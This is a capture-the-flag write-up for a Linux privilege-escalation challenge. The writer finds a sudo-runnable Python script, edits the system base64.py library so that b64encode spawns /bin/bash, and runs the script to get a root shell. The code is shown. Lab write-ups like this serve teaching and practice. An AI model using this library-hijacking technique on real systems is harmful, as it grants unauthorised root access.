200 points
AUTHOR: THEONESTE BYAGUTANGAZA
Description Getting root access can allow you to read the flag. Luckily there is a python file that you might like to play with. Through Social engineering, we’ve got the credentials to use on the server. SSH is running on the server.
Note: This challenge launches an instance on demand.
This challenge was solved by Kubana in my team.
So, google searching using python for privilege escalation in linux I got an article which detailed how to do just that (except the spawning shell part which I got from a youtube video).
Connecting to the server I checked what I can run with sudo with sudo -l and got:
User picoctf may run the following commands on challenge:
(ALL) /usr/bin/vi
(root) NOPASSWD: /usr/bin/python3 /home/picoctf/.server.pyCool we can run the script with sudo.
Now inside the script we have an import of base64, we could hijack a function used by this library.
I changed the code to just run the commands:
hi = "hi"
out = base64.b64encode(hi.encode('utf-8')).decode('utf-8')
print(out)
We need to hijack the function b64encode specifically to get root, and we could do so by editing the original library base64.py.
The file was located inside /usr/lib/python3.8/base64.py so running vim on it, I could edit the file.
I imported pty and at the start of the function b64encode, I added the line:
def b64encode(s, altchars=None):
"""Encode the bytes-like object s using Base64 and return a bytes object.
Optional altchars should be a byte string of length 2 which specifies an
alternative alphabet for the '+' and '/' characters. This allows an
application to e.g. generate url or filesystem safe Base64 strings.
"""
pty.spawn('/bin/bash')
#code...Finally, we can run the file with sudo /usr/bin/python3 /home/picoctf/.server.py got me a root shell!
Going into the directory /challenge and catting the file gives the flag:
picoCTF{your flag}